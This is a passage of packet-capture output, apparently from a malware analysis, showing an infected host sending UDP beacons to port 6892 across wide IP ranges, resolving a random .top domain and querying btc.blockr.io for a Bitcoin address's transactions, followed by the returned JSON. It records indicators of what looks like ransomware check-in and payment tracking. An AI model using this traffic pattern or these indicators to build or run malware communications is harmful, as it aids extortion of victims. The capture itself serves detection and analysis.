E..&C……….fz………r.hi00889070……..
2016-12-16 01:29:16.677103 IP 192.168.1.102.59297 > 122.1.13.13.6892: UDP, length 10
E..&z…..w….fz………r.hi00889070……..
2016-12-16 01:29:16.677150 IP 192.168.1.102.59297 > 122.1.13.14.6892: UDP, length 10
E..&………..fz………r.hi00889070……..
2016-12-16 01:29:16.677234 IP 192.168.1.102.59297 > 122.1.13.15.6892: UDP, length 10
E..&&J…..^…fz………r.hi00889070……..
2016-12-16 01:29:16.677288 IP 192.168.1.102.59297 > 122.1.13.16.6892: UDP, length 10
E..&Q……….fz………r.hi00889070……..
2016-12-16 01:29:16.677294 IP 192.168.1.102.59297 > 122.1.13.17.6892: UDP, length 10
E..&h……….fz………r.hi00889070……..
2016-12-16 01:29:16.677391 IP 192.168.1.102.59297 > 122.1.13.18.6892: UDP, length 10
E..&.L…..Y…fz………r.hi00889070……..

2016-12-16 01:29:16.678089 IP 192.168.1.102.59297 > 194.165.16.1.6892: UDP, length 10
E..&o…..7P…f……….’Uhi00889070……..
2016-12-16 01:29:16.678161 IP 192.168.1.102.59297 > 194.165.16.2.6892: UDP, length 10
E..&
……….f……….’Thi00889070……..
2016-12-16 01:29:16.678172 IP 192.168.1.102.59297 > 194.165.16.3.6892: UDP, length 10
E..&3+….s….f……….’Shi00889070……..
2016-12-16 01:29:16.678223 IP 192.168.1.102.59297 > 194.165.16.4.6892: UDP, length 10
E..&xk………f……….’Rhi00889070……..
2016-12-16 01:29:16.678305 IP 192.168.1.102.59297 > 194.165.16.5.6892: UDP, length 10
E..&A…..eT…f……….’Qhi00889070……..
2016-12-16 01:29:16.678357 IP 192.168.1.102.59297 > 194.165.16.6.6892: UDP, length 10
E..&$……y…f……….’Phi00889070……..
2016-12-16 01:29:16.678363 IP 192.168.1.102.59297 > 194.165.16.7.6892: UDP, length 10
E..&.c………f……….’Ohi00889070……..
2016-12-16 01:29:16.678411 IP 192.168.1.102.59297 > 194.165.16.8.6892: UDP, length 10
E..&.1………f……….’Nhi00889070……..
2016-12-16 01:29:16.678497 IP 192.168.1.102.59297 > 194.165.16.9.6892: UDP, length 10
E..&9…..n….f…     ……’Mhi00889070……..
2016-12-16 01:29:16.678550 IP 192.168.1.102.59297 > 194.165.16.10.6892: UDP, length 10
E..&]…..I?…f…
……’Lhi00889070……..
2016-12-16 01:29:16.678556 IP 192.168.1.102.59297 > 194.165.16.11.6892: UDP, length 10
E..&d…..B….f……….’Khi00889070……..
2016-12-16 01:29:16.678653 IP 192.168.1.102.59297 > 194.165.16.12.6892: UDP, length 10
E..&/i….w….f……….’Jhi00889070……..
2016-12-16 01:29:16.678659 IP 192.168.1.102.59297 > 194.165.16.13.6892: UDP, length 10
E..&…….j…f……….’Ihi00889070……..
2016-12-16 01:29:16.678737 IP 192.168.1.102.59297 > 194.165.16.14.6892: UDP, length 10
E..&s…..3C…f……….’Hhi00889070……..
2016-12-16 01:29:16.678791 IP 192.168.1.102.59297 > 194.165.16.15.6892: UDP, length 10
E..&Ju….\….f……….’Ghi00889070……..
2016-12-16 01:29:16.678797 IP 192.168.1.102.59297 > 194.165.16.16.6892: UDP, length 10
E..&=…..ie…f……….’Fhi00889070……..
2016-12-16 01:29:16.678845 IP 192.168.1.102.59297 > 194.165.16.17.6892: UDP, length 10
E..&.m………f……….’Ehi00889070……..
2016-12-16 01:29:16.678930 IP 192.168.1.102.59297 > 194.165.16.18.6892: UDP, length 10
E..&ay….E….f……….’Dhi00889070……..
2016-12-16 01:29:16.678982 IP 192.168.1.102.59297 > 194.165.16.19.6892: UDP, length 10

2016-12-16 01:29:17.684432 IP 192.168.1.102.59297 > 194.165.17.0.6892: UDP, length 10
E..&    ……i…f……….&Vhi00889070……..
2016-12-16 01:29:17.684438 IP 192.168.1.102.59297 > 194.165.17.1.6892: UDP, length 10
E..&2y….s….f……….&Uhi00889070……..
2016-12-16 01:29:17.684476 IP 192.168.1.102.59297 > 194.165.17.2.6892: UDP, length 10
E..&UE….P….f……….&Thi00889070……..
2016-12-16 01:29:17.684598 IP 192.168.1.102.59297 > 194.165.17.3.6892: UDP, length 10
E..&n…..7|…f……….&Shi00889070……..
2016-12-16 01:29:17.684620 IP 192.168.1.102.59297 > 194.165.17.4.6892: UDP, length 10
E..&’…..~-…f……….&Rhi00889070……..
2016-12-16 01:29:17.684626 IP 192.168.1.102.59297 > 194.165.17.5.6892: UDP, length 10
E..& ……….f……….&Qhi00889070……..
2016-12-16 01:29:17.684754 IP 192.168.1.102.59297 > 194.165.17.6.6892: UDP, length 10
E..&{=….*….f……….&Phi00889070……..
2016-12-16 01:29:17.684775 IP 192.168.1.102.59297 > 194.165.17.7.6892: UDP, length 10
E..&D…..a …f……….&Ohi00889070……..
2016-12-16 01:29:17.684801 IP 192.168.1.102.59297 > 194.165.17.8.6892: UDP, length 10
E..&`…..Es…f……….&Nhi00889070……..
2016-12-16 01:29:17.684908 IP 192.168.1.102.59297 > 194.165.17.9.6892: UDP, length 10
E..&gK….>….f…     ……&Mhi00889070……..
2016-12-16 01:29:17.684929 IP 192.168.1.102.59297 > 194.165.17.10.6892: UDP, length 10
E..&………..f…
……&Lhi00889070……..
2016-12-16 01:29:17.684955 IP 192.168.1.102.59297 > 194.165.17.11.6892: UDP, length 10
E..&;…..jR…f……….&Khi00889070……..
2016-12-16 01:29:17.685063 IP 192.168.1.102.59297 > 194.165.17.12.6892: UDP, length 10
E..&r…..3….f……….&Jhi00889070……..
2016-12-16 01:29:17.685085 IP 192.168.1.102.59297 > 194.165.17.13.6892: UDP, length 10
E..&IC….\….f……….&Ihi00889070……..
:

2016-12-16 01:29:30.058704 IP 192.168.1.102.59298 > 15.49.2.0.6892: UDP, length 24
E..4$…..C….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058735 IP 192.168.1.102.59298 > 15.49.2.1.6892: UDP, length 24
E..4.d….K….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058741 IP 192.168.1.102.59298 > 15.49.2.2.6892: UDP, length 24
E..4x……….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058852 IP 192.168.1.102.59298 > 15.49.2.3.6892: UDP, length 24
E..4A…..&….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058864 IP 192.168.1.102.59298 > 15.49.2.4.6892: UDP, length 24
E..4.   ….]m…f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.058905 IP 192.168.1.102.59298 > 15.49.2.5.6892: UDP, length 24
E..43\….5….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059018 IP 192.168.1.102.59298 > 15.49.2.6.6892: UDP, length 24
E..4V2…..B…f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059041 IP 192.168.1.102.59298 > 15.49.2.7.6892: UDP, length 24
E..4p……m…f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059046 IP 192.168.1.102.59298 > 15.49.2.8.6892: UDP, length 24
E..4s……….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059145 IP 192.168.1.102.59298 > 15.49.2.9.6892: UDP, length 24
E..4J……….f.1.     ….. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059156 IP 192.168.1.102.59298 > 15.49.2.10.6892: UDP, length 24
E..4/l….9….f.1.
….. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059223 IP 192.168.1.102.59298 > 15.49.2.11.6892: UDP, length 24
E..4……Q….f.1……. 2.2107cd482fd40088950110cf
2016-12-16 01:29:30.059292 IP 192.168.1.102.59298 > 15.49.2.12.6892: UDP, length 24
E..4^…..
c…f.1……. 2.2107cd482fd40088950110cf

2016-12-16 01:32:13.634751 IP 192.168.1.102.50425 > 75.75.75.75.53: 35627+ A? ftoxmpdipwobp4qy.joa688.top. (45)
E..I………..fKKKK…5.5~R.+………..ftoxmpdipwobp4qy.joa688.top…..

2016-12-16 01:32:14.439186 IP 192.168.1.102.58408 > 75.75.75.75.53: 63853+ A? btc.blockr.io. (31)
E..;………..fKKKK.(.5.’…m………..btc.blockr.io…..
2016-12-16 01:32:14.511003 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [S], seq 3315200002, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4c.@…9-…f…….P………. .w……………
2016-12-16 01:32:14.643338 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [.], ack 604253513, win 256, length 0
E..(c.@…98…f…….P….$.-IP………….
2016-12-16 01:32:14.647140 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 0:254, ack 1, win 256, length 254: HTTP: GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
E..&c.@…89…f…….P….$.-IP…>…GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: btc.blockr.io/api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757
Connection: Keep-Alive

2016-12-16 01:32:15.111089 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 254:534, ack 25007, win 256, length 280: HTTP: GET /api/v1/tx/info/60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea?_=1481869858429 HTTP/1.1
E..@c.@…8….f…….P….$…P…!…GET /api/v1/tx/info/60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea?_=1481869858429 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: btc.blockr.io
Connection: Keep-Alive

 

2016-12-16 01:33:53.309648 IP 192.168.1.102.49833 > 91.121.230.214.443: Flags [.], ack 544, win 948, length 0

 

The data pulled from the btc.blockr.io link :

 

{"status":"success","data":{"address":"17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt","limit_txs":200,"nb_txs":145,"nb_txs_displayed":145,"txs":[{"tx":"5712191df3ff261e492696e00078be2b582bbdb94af2c35d952237432404b4b3","time_utc":"2016-12-16T00:41:46Z","confirmations":43,"amount":0.45874077,"amount_multisig":0},{"tx":"60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea","time_utc":"2016-12-16T00:17:25Z","confirmations":44,"amount":-0.46037778,"amount_multisig":0},{"tx":"9ed8fab7df73a40f41616368ae8c4630128b9acc3117520da03908702a5c7918","time_utc":"2016-12-15T23:17:13Z","confirmations":52,"amount":0.46037778,"amount_multisig":0},{"tx":"f1672adba2f8245faf6568462bb38b47ee436156803646f8437e203e59cb435c","time_utc":"2016-12-15T23:03:28Z","confirmations":53,"amount":-0.46197889,"amount_multisig":0},{"tx":"3c85a60667beacfe81aa52b323a88f037127716f5f8e421b6d9d371ac11c9bd1","time_utc":"2016-12-14T22:05:11Z","confirmations":184,"amount":0.46197889,"amount_multisig":0},{"tx":"eeb2704655f9c41690bfd8acf760a4a4f1f3f503eebe60cedc6065748256a6f7","time_utc":"2016-12-14T21:56:23Z","confirmations":185,"amount":-0.46369457,"amount_multisig":0},{"tx":"3305874b3e467e9d5412fed58c59f71966464ba6098b028eeec9587894d6a3f2","time_utc":"2016-12-14T09:44:57Z","confirmations":260,"amount":0.46369457,"amount_multisig":0},{"tx":"2829831beec7140aa1f89305c0e93ee181e6aa5b1fd146b739191263e137dca5","time_utc":"2016-12-14T09:17:29Z","confirmations":261,"amount":-0.46503174,"amount_multisig":0},{"tx":"d408af4439c865d89571de27c348fb2593fcf579773971ded586caa4a00d476f","time_utc":"2016-12-13T13:41:22Z","confirmations":377,"amount":0.46503174,"amount_multisig":0},{"tx":"149170830550ec8c023ab3e3a41c6865dcb55d2c86a6de51d0acb5ed7ff30463","time_utc":"2016-12-13T13:35:55Z","confirmations":378,"amount":-0.46647336,"amount_multisig":0},{"tx":"95b41dd061f3b37dd4a47444cc644cf03fcd6cc9b8e4ab7b7b8464729ed0f659","time_utc":"2016-12-13T12:22:43Z","confirmations":388,"amount":0.46647336,"amount_multisig":0},{"tx":"d6452ee98ef8b5007dc22024a9408dd10f7f6ecd5b5b733850e005b6fb1c97f6"